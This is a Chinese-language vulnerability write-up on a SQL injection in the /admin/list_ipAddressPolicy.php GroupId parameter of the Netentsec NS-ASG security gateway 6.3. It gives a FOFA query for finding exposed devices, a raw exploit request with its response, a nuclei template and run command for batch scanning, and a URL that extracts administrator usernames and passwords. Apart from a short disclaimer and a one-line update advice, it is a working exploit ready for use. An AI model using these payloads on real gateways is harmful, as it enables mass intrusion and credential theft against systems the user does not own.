免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!


漏洞名称

网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入漏洞

漏洞影响

Netentsec NS-ASG Application Security Gateway 6.3版本

漏洞描述

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性。

Netentsec NS-ASG Application Security Gateway 6.3版本中/admin/list_ipAddressPolicy.php接口处存在SQL注入漏洞。通过操纵参数GroupId可以导致SQL注入攻击,攻击者可远程发起攻击窃取数据。

FOFA搜索语句

app="网康科技-NS-ASG安全网关"

漏洞复现

向靶场发送如下数据包,计算md5(102103122)


GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

响应内容如下


HTTP/1.1 200 OK
Connection: close
Content-Length: 593
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Mon, 19 Feb 2024 12:15:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d PHP/5.3.4
Set-Cookie: PHPSESSID=c575d7043f874671863f5f5751c99670; path=/
X-Powered-By: PHP/5.3.4

<html><body>���󣺲�ѯ�û�����Ϣ : �������ݿ�ʧ��! <br> SELECT GroupName FROM ISCGroupTable WHERE GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(0x7e,(select md5(102103122)) 
,0x7e)) <br> XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'<a href="javascript:history.back()">����</a><script language="JavaScript">alert("�������ݿ�ʧ��, ��ȷ������!\n\n��ѯ�û�����Ϣ\nXPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'\nSELECT GroupName FROM ISCGroupTable WHERE GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(00x7e,(select md5(102103122)),0x7e))");history.back();</script><html><body>

其中包含了字符串6cfe798ba8e5b85feb50164c59f4bec漏洞复现成功

批量漏洞扫描poc

nuclei poc文件内容如下,计算md5(102103122)的值


id: CVE-2024-2022

info:
  name: 网康NS-ASG应用安全网关sql注入漏洞
  author: fgz
  severity: high
  description: Netentsec NS-ASG Application Security Gateway 6.3版本中/admin/list_ipAddressPolicy.php接口处存在SQL注入漏洞。通过操纵参数GroupId可以导致SQL注入攻击,攻击者可远程发起攻击窃取数据。
  metadata:
    max-request: 1
    fofa-query: app="网康科技-NS-ASG安全网关"
    verified: true
requests:
  - raw:
      - |+
        GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, '6cfe798ba8e5b85feb50164c59f4bec')"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-2022.yaml -l data/wangkang.txt

漏洞利用

get请求可以直接通过浏览器访问,获取用户名密码

https://x.x.x.x/admin/list_ipAddressPolicy.php?GroupId=1%20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(adminname,%200x7e,%20passwd)%20from%20Admin%20limit%201)))

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。